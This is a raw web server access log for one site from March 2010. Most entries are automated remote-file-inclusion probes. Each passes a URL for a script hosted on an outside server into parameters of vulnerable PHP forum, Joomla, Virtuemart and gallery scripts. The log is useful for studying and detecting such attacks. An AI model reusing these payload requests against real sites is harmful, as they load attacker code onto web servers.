118.129.166.154 - - [09/Mar/2010:05:47:05 -0800] "GET /logs/access.log//bbs//////////good.php?board_skin_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.166.154 - - [09/Mar/2010:05:47:05 -0800] "GET /logs//bbs//////////good.php?board_skin_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.166.154 - - [09/Mar/2010:05:47:06 -0800] "GET /bbs//////////good.php?board_skin_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
209.217.76.226 - - [09/Mar/2010:05:47:53 -0800] "GET /logs/access.log%20%20/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
209.217.76.226 - - [09/Mar/2010:05:47:53 -0800] "GET /?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
209.217.76.226 - - [09/Mar/2010:05:47:53 -0800] "GET /logs/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 1939 "-" "Mozilla/5.0" "www.redneckmba.com"
209.217.76.226 - - [09/Mar/2010:05:48:45 -0800] "GET /logs/access.log/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
209.217.76.226 - - [09/Mar/2010:05:48:45 -0800] "GET /logs/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 1939 "-" "Mozilla/5.0" "www.redneckmba.com"
209.217.76.226 - - [09/Mar/2010:05:48:46 -0800] "GET /?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [09/Mar/2010:05:50:17 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
61.100.181.218 - - [09/Mar/2010:05:50:23 -0800] "GET /logs/access.log%20%20///delete.php?board_skin_path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
61.100.181.218 - - [09/Mar/2010:05:50:23 -0800] "GET /logs///delete.php?board_skin_path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
61.100.181.218 - - [09/Mar/2010:05:50:23 -0800] "GET //delete.php?board_skin_path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
78.110.50.114 - - [09/Mar/2010:05:50:50 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
78.110.50.114 - - [09/Mar/2010:05:50:50 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
78.110.50.114 - - [09/Mar/2010:05:50:51 -0800] "GET /bbs/write_update.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
220.80.108.81 - - [09/Mar/2010:05:58:49 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "redneckmba.com"
220.80.108.81 - - [09/Mar/2010:05:58:50 -0800] "GET /bbs/delete_all.php?board_skin_path=? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "redneckmba.com"
220.80.108.81 - - [09/Mar/2010:05:58:50 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "redneckmba.com"
218.55.227.145 - - [09/Mar/2010:06:00:43 -0800] "GET /admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
218.55.227.145 - - [09/Mar/2010:06:00:43 -0800] "GET /logs/access.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
218.55.227.145 - - [09/Mar/2010:06:00:43 -0800] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.170.49 - - [09/Mar/2010:06:07:38 -0800] "GET /logs/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 1939 "-" "Mozilla/5.0" "www.redneckmba.com"
118.129.170.49 - - [09/Mar/2010:06:07:38 -0800] "GET /logs/access.log%20%20/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.129.170.49 - - [09/Mar/2010:06:07:38 -0800] "GET /?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
118.129.170.49 - - [09/Mar/2010:06:08:11 -0800] "GET /logs/access.log%20%20/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.129.170.49 - - [09/Mar/2010:06:08:03 -0800] "GET /?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
118.129.170.49 - - [09/Mar/2010:06:08:03 -0800] "GET /logs/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 1939 "-" "Mozilla/5.0" "www.redneckmba.com"
61.100.181.218 - - [09/Mar/2010:06:13:46 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.100.181.218 - - [09/Mar/2010:06:13:46 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.100.181.218 - - [09/Mar/2010:06:13:46 -0800] "GET /logs/access.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.100.181.218 - - [09/Mar/2010:06:13:48 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.100.181.218 - - [09/Mar/2010:06:13:48 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.100.181.218 - - [09/Mar/2010:06:13:48 -0800] "GET /logs/access.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
78.110.50.114 - - [09/Mar/2010:06:18:17 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
78.110.50.114 - - [09/Mar/2010:06:26:11 -0800] "GET /bbs/write_update.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
78.110.50.114 - - [09/Mar/2010:06:26:12 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
78.110.50.114 - - [09/Mar/2010:06:26:12 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
72.249.104.35 - - [09/Mar/2010:06:27:32 -0800] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
72.249.104.35 - - [09/Mar/2010:06:27:32 -0800] "GET /logs/access.log%20%20//includes/tgpinc.php?DOCUMENT_ROOT=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
72.249.104.35 - - [09/Mar/2010:06:27:32 -0800] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
116.40.122.117 - - [09/Mar/2010:06:28:34 -0800] "GET /logs//bbs//////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
116.40.122.117 - - [09/Mar/2010:06:28:35 -0800] "GET /logs/access.log//bbs//////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
116.40.122.117 - - [09/Mar/2010:06:28:35 -0800] "GET /bbs//////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.163.171.205 - - [09/Mar/2010:06:31:04 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.105 - - [09/Mar/2010:06:31:28 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
83.103.72.130 - - [09/Mar/2010:06:38:49 -0800] "GET /ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
83.103.72.130 - - [09/Mar/2010:06:38:49 -0800] "GET /logs//ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
83.103.72.130 - - [09/Mar/2010:06:38:50 -0800] "GET /logs/access.log%20%20//ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
83.103.72.130 - - [09/Mar/2010:06:40:10 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
83.103.72.130 - - [09/Mar/2010:06:40:10 -0800] "GET /ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
83.103.72.130 - - [09/Mar/2010:06:40:10 -0800] "GET /logs//ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
220.80.108.81 - - [09/Mar/2010:06:44:11 -0800] "GET //bbs/delete_all.php?board_skin_path=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
220.80.108.81 - - [09/Mar/2010:06:44:12 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
220.80.108.81 - - [09/Mar/2010:06:44:13 -0800] "GET /logs/access.log///bbs/delete_all.php?board_skin_path=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
83.103.72.130 - - [09/Mar/2010:06:44:17 -0800] "GET /ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
83.103.72.130 - - [09/Mar/2010:06:44:17 -0800] "GET /logs//ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
83.103.72.130 - - [09/Mar/2010:06:44:17 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
78.110.50.120 - - [09/Mar/2010:06:44:33 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
78.110.50.120 - - [09/Mar/2010:06:44:33 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
78.110.50.120 - - [09/Mar/2010:06:44:33 -0800] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
220.80.108.81 - - [09/Mar/2010:06:45:15 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
220.80.108.81 - - [09/Mar/2010:06:45:16 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
220.80.108.81 - - [09/Mar/2010:06:45:16 -0800] "GET /logs/access.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
220.80.108.81 - - [09/Mar/2010:06:50:29 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
220.80.108.81 - - [09/Mar/2010:06:50:29 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
220.80.108.81 - - [09/Mar/2010:06:50:29 -0800] "GET /logs/access.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.123.194 - - [09/Mar/2010:06:58:10 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
65.18.192.91 - - [09/Mar/2010:07:00:19 -0800] "GET /logs/access.log//ting_music//write.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
65.18.192.91 - - [09/Mar/2010:07:00:19 -0800] "GET /ting_music//write.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
65.18.192.91 - - [09/Mar/2010:07:00:19 -0800] "GET /logs//ting_music//write.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.47.237.17 - - [09/Mar/2010:07:17:57 -0800] "GET //vwar/backup/errors.php?error=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.47.237.17 - - [09/Mar/2010:07:17:57 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.47.237.17 - - [09/Mar/2010:07:17:57 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.47.237.17 - - [09/Mar/2010:07:19:10 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.47.237.17 - - [09/Mar/2010:07:19:10 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.47.237.17 - - [09/Mar/2010:07:19:10 -0800] "GET //vwar/backup/errors.php?error=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
219.240.39.222 - - [09/Mar/2010:07:21:58 -0800] "GET /logs/access.log//download.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
219.240.39.222 - - [09/Mar/2010:07:21:58 -0800] "GET /logs//download.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
219.240.39.222 - - [09/Mar/2010:07:21:58 -0800] "GET /download.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
116.40.122.117 - - [09/Mar/2010:07:24:30 -0800] "GET /logs//appserv/main.php?appserv_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
116.40.122.117 - - [09/Mar/2010:07:24:30 -0800] "GET /appserv/main.php?appserv_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
116.40.122.117 - - [09/Mar/2010:07:24:30 -0800] "GET /logs/access_100104.log//appserv/main.php?appserv_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
116.40.122.117 - - [09/Mar/2010:07:24:48 -0800] "GET /logs//appserv/main.php?appserv_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
116.40.122.117 - - [09/Mar/2010:07:24:48 -0800] "GET /logs/access_100104.log//appserv/main.php?appserv_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
116.40.122.117 - - [09/Mar/2010:07:24:48 -0800] "GET /appserv/main.php?appserv_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [09/Mar/2010:07:24:58 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
124.49.100.254 - - [09/Mar/2010:07:29:18 -0800] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
124.49.100.254 - - [09/Mar/2010:07:29:18 -0800] "GET /logs////////?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 200 1950 "-" "Mozilla/5.0" "redneckmba.com"
124.49.100.254 - - [09/Mar/2010:07:29:19 -0800] "GET ///////?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 200 784 "-" "Mozilla/5.0" "redneckmba.com"
124.49.100.254 - - [09/Mar/2010:07:30:40 -0800] "GET ///////?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 200 784 "-" "Mozilla/5.0" "redneckmba.com"
124.49.100.254 - - [09/Mar/2010:07:30:41 -0800] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
124.49.100.254 - - [09/Mar/2010:07:30:41 -0800] "GET /logs////////?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 200 1950 "-" "Mozilla/5.0" "redneckmba.com"
66.163.171.205 - - [09/Mar/2010:07:32:37 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.218.116.131 - - [09/Mar/2010:07:46:42 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.redneckmba.com"
200.93.147.154 - - [09/Mar/2010:07:53:00 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [09/Mar/2010:07:53:00 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [09/Mar/2010:07:53:03 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [09/Mar/2010:07:53:26 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [09/Mar/2010:07:53:26 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [09/Mar/2010:07:53:28 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [09/Mar/2010:07:59:22 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [09/Mar/2010:07:59:22 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [09/Mar/2010:07:59:22 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:07:59:26 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:07:59:26 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:07:59:26 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:07:59:26 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:07:59:26 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:07:59:26 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:07:59:26 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:07:59:26 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:07:59:26 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:07:59:26 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:07:59:26 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:07:59:26 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:08:01:42 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:02:06 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:02:06 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:02:06 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:02:17 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:02:17 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
